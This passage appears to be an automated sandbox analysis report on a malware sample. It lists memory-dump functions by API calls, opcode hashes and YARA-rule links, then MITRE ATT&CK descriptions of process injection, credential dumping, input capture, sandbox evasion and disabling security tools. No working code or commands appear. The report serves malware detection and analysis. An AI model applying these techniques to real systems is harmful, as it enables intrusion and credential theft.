Instruction ID: 3a1bec06a0745dcc97f36c867f3fd8b6f41d68b1ab86894687567e680db610e7
Opcode Fuzzy Hash: ba7aa309c6d0b22a8a70fcf2b6c91f3109f5574c671e7570046b03c40d753423
Instruction Fuzzy Hash: 44718439906228CFCB64DF64D88D69DB7B2BF4A306F1045D9D54AA2350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98C09 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cafcc96c6b74ba2aa9cea8499440e66a3578ec1d63adbb58f48bf2232e911124
Instruction ID: 195c3e0f05461b80d2d62636ca1d0eee3bb9e7bc15db0e5cba2ce61bde3df0b5
Opcode Fuzzy Hash: cafcc96c6b74ba2aa9cea8499440e66a3578ec1d63adbb58f48bf2232e911124
Instruction Fuzzy Hash: 3C719639906228CFDB64DB64D88D69CB7B2BF46305F1045D9D54AA3350CB356E81CF52

Uniqueness

Uniqueness Score: -1.00%

Function 06955D08 Relevance: 1.6, APIs: 1, Instructions: 138libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06955D69

Memory Dump Source

Source File: 0000000A.00000002.551411606.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6950000_SecuriteInfo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f53700b176b93557c4c9938905ceafbb6ab19d49005a2c6e542a662d1cc645ff
Instruction ID: 98e9599a2352444cb59c24e5457ddf14a6defb3594cc9d296849c2cc63124dbd
Opcode Fuzzy Hash: f53700b176b93557c4c9938905ceafbb6ab19d49005a2c6e542a662d1cc645ff
Instruction Fuzzy Hash: 80417430B102059FCB04EBB4D889EAEB7B6BF48304F158929E912DB755EF35DD058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C98C51 Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f313bdb2703aa8b263d801755d05df4e16242d5fce9fcbd84f06cd4975f981c2
Instruction ID: 6ed9a98c7c05ee1fe1e8fbf9a2853110a70b95ed54155f8325d7201a966c1b47
Opcode Fuzzy Hash: f313bdb2703aa8b263d801755d05df4e16242d5fce9fcbd84f06cd4975f981c2
Instruction Fuzzy Hash: C1619639902228CFCB64DF64D88D69DB7B2BF4A306F2045D9D54A93350CB356E85CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98C99 Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8f11a0de74617334b1fefb0c1602c3663cf31099a0f0bb4ce452fcd20aef734c
Instruction ID: 15ab3d907b217fb8a5d0d150cd90844977c13ea071781cd97cb26daac6b48963
Opcode Fuzzy Hash: 8f11a0de74617334b1fefb0c1602c3663cf31099a0f0bb4ce452fcd20aef734c
Instruction Fuzzy Hash: 43518639901228CFDB64DF64D88DA9DB7B2BF4A306F1045D9D54A93350CB356E81CF52

Uniqueness

Uniqueness Score: -1.00%

Function 05C98CE1 Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: de5be569b628cd9f5f6534c66d3ebe01fe0e9a70d0a0cc2b983b775095d816ab
Instruction ID: 67324a15d72a4775ae7e7b0294771286ff9416d029c33e6e66ba07fcc4a5adde
Opcode Fuzzy Hash: de5be569b628cd9f5f6534c66d3ebe01fe0e9a70d0a0cc2b983b775095d816ab
Instruction Fuzzy Hash: EE519639902228CFCB64DB65D88DB9DB7B2BF46305F2045D9E54A93350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 06A1E050 Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06A1E162

Memory Dump Source

Source File: 0000000A.00000002.551949266.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6a10000_SecuriteInfo.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 68dc5e080693b526cf475983ebb726a0e4b02e7f49474f939a928f58e6a4c9d9
Instruction ID: 314c96f4ce51bbb3e9db61441542bae68132e650ef7978b8579b39da9c25bca0
Opcode Fuzzy Hash: 68dc5e080693b526cf475983ebb726a0e4b02e7f49474f939a928f58e6a4c9d9
Instruction Fuzzy Hash: EC51BEB1D103499FDF14CF99C884ADEBBB5BF88314F24812AE819AB210D775A885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05C98D1D Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cd573f64b257b867dd8c0d325c7caed6a568aa2314b8adee20c499ebb3915936
Instruction ID: 1abf9c05a0b0385a938adfb3e181354550677d47f14033aca7f35528d6226ef8
Opcode Fuzzy Hash: cd573f64b257b867dd8c0d325c7caed6a568aa2314b8adee20c499ebb3915936
Instruction Fuzzy Hash: 3D519739901228CFCB64DB64D88DB9DB7B2BF46305F2045D9E54A93350CB356E81CF62

Uniqueness

Uniqueness Score: -1.00%

Function 05C98D59 Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 69b0d211fc831eeff38953e4127f9a9f9dc22934bf3a7e7a3b0780c7a66d2afb
Instruction ID: 951dd99d6d02ce9a0ae3adf2f48a02421c06041cbcb7226aff71f11b96f55244
Opcode Fuzzy Hash: 69b0d211fc831eeff38953e4127f9a9f9dc22934bf3a7e7a3b0780c7a66d2afb
Instruction Fuzzy Hash: 5E519639901228CFCB64DB64D88DB9DB7B2BF46305F2045D9E54AA3350CB356E81CF52

Uniqueness

Uniqueness Score: -1.00%

Function 05C98DA1 Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3a97256f0f89ff3d0b103f3a1fafcbfa5b3076b3d292347d44234919f49d5451
Instruction ID: 06d9032e2206c3cc13008406e52886d27f190def18768d72d7c7fe1ce4ededd6
Opcode Fuzzy Hash: 3a97256f0f89ff3d0b103f3a1fafcbfa5b3076b3d292347d44234919f49d5451
Instruction Fuzzy Hash: 1A419539901228CFCB64DB65D88DA9DB7B2BF4A305F2045E9E54AA3350CB356E81CF52

Uniqueness

Uniqueness Score: -1.00%

Function 05C98DE9 Relevance: 1.6, APIs: 1, Instructions: 91COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05C98E10

Memory Dump Source

Source File: 0000000A.00000002.549644833.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5c90000_SecuriteInfo.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 97b693ee1c36356dcab1c0eb50d3bb30449d1e8960d491f8fd4999cf69c95ad4
Instruction ID: 137764c83dfdf184296cba28c9c1ce6d7fe17e2970db3c0a530730b38aaf2db9
Opcode Fuzzy Hash: 97b693ee1c36356dcab1c0eb50d3bb30449d1e8960d491f8fd4999cf69c95ad4
Instruction Fuzzy Hash: FB419439901228CFCB64DB64D88DA9DB7B2BF4A305F2045E9E54AA3350CB356E81CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00F6B894 Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 00F6D8A2

Memory Dump Source

Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d53e3135d37e1494bacb85432ce501cb08a864799c066052cbb23f05a7d14e55
Instruction ID: 550653483b4548b8577311589c954b22865a4a2675f8d73a10ebcbe89498979d
Opcode Fuzzy Hash: d53e3135d37e1494bacb85432ce501cb08a864799c066052cbb23f05a7d14e55
Instruction Fuzzy Hash: 613104B0E102599FDB14CFA9C889B9DBBF1FB49314F14812EE815A7380D7749845DF92

Uniqueness

Uniqueness Score: -1.00%

Function 00F6D7CC Relevance: 1.6, APIs: 1, Instructions: 90libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 00F6D8A2

Memory Dump Source

Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a31d21a1d027e64bfc45cfaeefe03a29d8d7f15197e900ee277a1621696d50ff
Instruction ID: e9d52c828388c6fcbcc07c00a8d2c14b11f3afedb77f79beefb6d7a02f54bf9a
Opcode Fuzzy Hash: a31d21a1d027e64bfc45cfaeefe03a29d8d7f15197e900ee277a1621696d50ff
Instruction Fuzzy Hash: BD4113B0E102598FDB14CFA9C889B9EBBB1FB48314F14812EE815A7380D7759845DF92

Uniqueness

Uniqueness Score: -1.00%

Function 06A126A8 Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06A1CD61

Memory Dump Source

Source File: 0000000A.00000002.551949266.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6a10000_SecuriteInfo.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 17785cd7d7f091373ee4f5c147be721689df3c4b4bb90b1d837b8afcdc5b30ed
Instruction ID: 8bc4da435c9c0aed69aeb65b8e4b333d0acac4462a3e66abd5d66c964a90b143
Opcode Fuzzy Hash: 17785cd7d7f091373ee4f5c147be721689df3c4b4bb90b1d837b8afcdc5b30ed
Instruction Fuzzy Hash: CC41FFB1D402589FCB60DF9AC884ADEBFF5BF48714F14802AE81AAB300D774A905CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06A1269C Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 06A1CAA4

Memory Dump Source

Source File: 0000000A.00000002.551949266.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6a10000_SecuriteInfo.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 7ccb92042fd6a04f365fed1f53393a807032807dc637bea9cec7183252a8c730
Instruction ID: cd9cb9cfd220ddebe5ca6be278dedae4434439a09dae3f2cbfe574a5ac74d107
Opcode Fuzzy Hash: 7ccb92042fd6a04f365fed1f53393a807032807dc637bea9cec7183252a8c730
Instruction Fuzzy Hash: BD3111B0D012499FDB10DF99C584A9EFBF5BF48314F28816EE409AB301C775A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06A1FC40 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06A1FCC7

Memory Dump Source

Source File: 0000000A.00000002.551949266.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6a10000_SecuriteInfo.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f19c814f2c3dda44a08516b844048eeda214456a3412d6ed4839f0e4a1c28ec0
Instruction ID: a84b892c8bca22f48dabbd541b41c2bffe43e83a4a0aece79d5ed98190c5329f
Opcode Fuzzy Hash: f19c814f2c3dda44a08516b844048eeda214456a3412d6ed4839f0e4a1c28ec0
Instruction Fuzzy Hash: 9B21DFB5D002499FDB10CFAAD884ADEBBF8FB48324F14841AE915B7310D379A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F658CF Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00F6595A

Memory Dump Source

Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 166fe3902a43171645be5a65adcce15708a994074fce89f8f9f2596c9b57ec39
Instruction ID: 55a7c6395498183f54fb14bf2326824044e041e5fe977902f30224b3988de70b
Opcode Fuzzy Hash: 166fe3902a43171645be5a65adcce15708a994074fce89f8f9f2596c9b57ec39
Instruction Fuzzy Hash: B2216AB1905785CFDB10DFA8C94879ABBF0EB06328F19846AC445F3641C7395508CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F658E0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00F6595A

Memory Dump Source

Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: af83409ee570cddadd43d01dd2761970b59f585fff29051885f26b459ec1d49c
Instruction ID: d1fc26bd961589e2566e3c9c35d109671980d7cadd51a08d05bfaebe19993df4
Opcode Fuzzy Hash: af83409ee570cddadd43d01dd2761970b59f585fff29051885f26b459ec1d49c
Instruction Fuzzy Hash: 9A1186B0900349CFEB10DFA9D848B9EBBF4EB49724F18842AD445B3600C738A948CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F60A98 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 00F60B06

Memory Dump Source

Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: 6dc305a86ecdfa276abe6474456ca66b1af9073f96fefd9f4cd8c641d1c08390
Instruction ID: b76e35f434e04c21a1e0c20c7bb9818b4f56ad22afa386a908ba184f27ebc156
Opcode Fuzzy Hash: 6dc305a86ecdfa276abe6474456ca66b1af9073f96fefd9f4cd8c641d1c08390
Instruction Fuzzy Hash: 502112B59002499FCF10CF9AC884BDEBBF8FB88324F248419E529A7210C775A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F60B52 Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00F60BB7

Memory Dump Source

Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 78fc760b6e598f5bf1c65660cdeac89a12fff05dd0a245a72246ab18de498ea4
Instruction ID: 6b0619a4ab0d3a696d7b80a5fa08b18bebcd75322a7c93c14efaba6d13f989df
Opcode Fuzzy Hash: 78fc760b6e598f5bf1c65660cdeac89a12fff05dd0a245a72246ab18de498ea4
Instruction Fuzzy Hash: 1D1113B48002498FCB10CF9AC484BDEBBF4EB89324F148459D529A7341C775A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F60B58 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00F60BB7

Memory Dump Source

Source File: 0000000A.00000002.522893110.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f60000_SecuriteInfo.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 18b3693beaee6b4a13cb2c88a980c067596458b4e53a7305efeacd866631e827
Instruction ID: 4fcafab85345dbbf922c4193598f3976db4e68f142213794ec8ba7cfa35b95fd
Opcode Fuzzy Hash: 18b3693beaee6b4a13cb2c88a980c067596458b4e53a7305efeacd866631e827
Instruction Fuzzy Hash: 5711F2B58002498FDB10CF9AC884BDEFBF4EB89328F14845AD529B7340C775A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EFDA01 Relevance: 1.0, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.522332823.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_efd000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fefad8859e050c5c9b763882cc6948bcdb8666b4b1660103270f96e2c63ed80b
Instruction ID: d2bc07da2e26857193fe53254613925b538a41ed804dedbce3e8267432a7cd3b
Opcode Fuzzy Hash: fefad8859e050c5c9b763882cc6948bcdb8666b4b1660103270f96e2c63ed80b
Instruction Fuzzy Hash: 6B320266A4E7C14FD31347385C706927FB15F47219B2E42DBC8D4CA9E3C25A682ECB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EED3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.522159044.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_eed000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 299ebd35cedef45d871924ecc2a8b2f7c9c69968432e45ec62d1acb4a3db30cf
Instruction ID: e437c62faba5e1ab3ff57879a45a5ce1d529938a8fdcc1ca7f57eedf75054284
Opcode Fuzzy Hash: 299ebd35cedef45d871924ecc2a8b2f7c9c69968432e45ec62d1acb4a3db30cf
Instruction Fuzzy Hash: CB213AB1508288DFDB04DF10DDC0F26BB65FBA4324F24C579E9095B286C336E856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EFE3F0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.522332823.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_efd000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb66988699e30bcc970d01918ad86b24e1169ec54fb0cb0948daf3e13ec72bfe
Instruction ID: 1ce36650be3a1b7684087b952682cdcbbf8ea854913b27aa754366f008c78848
Opcode Fuzzy Hash: eb66988699e30bcc970d01918ad86b24e1169ec54fb0cb0948daf3e13ec72bfe
Instruction Fuzzy Hash: 72213A71504208DFDB14CF10D8C4B36BB65FB84318F24C96DDA095B356C33AEC46CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EED3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.522159044.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_eed000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17894ca1eab804f1555070659dd00dfff87542e61665d1c8f73af2d5ff09c7fa
Instruction ID: 3523114d332e83efd845bc015b72476be3c45a0ac7234b3addbeb72e9ce58639
Opcode Fuzzy Hash: 17894ca1eab804f1555070659dd00dfff87542e61665d1c8f73af2d5ff09c7fa
Instruction Fuzzy Hash: AC11E676404284DFCF11CF10D9C4B16BF72FB94324F28C6A9D8095B656C33AE856CBA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
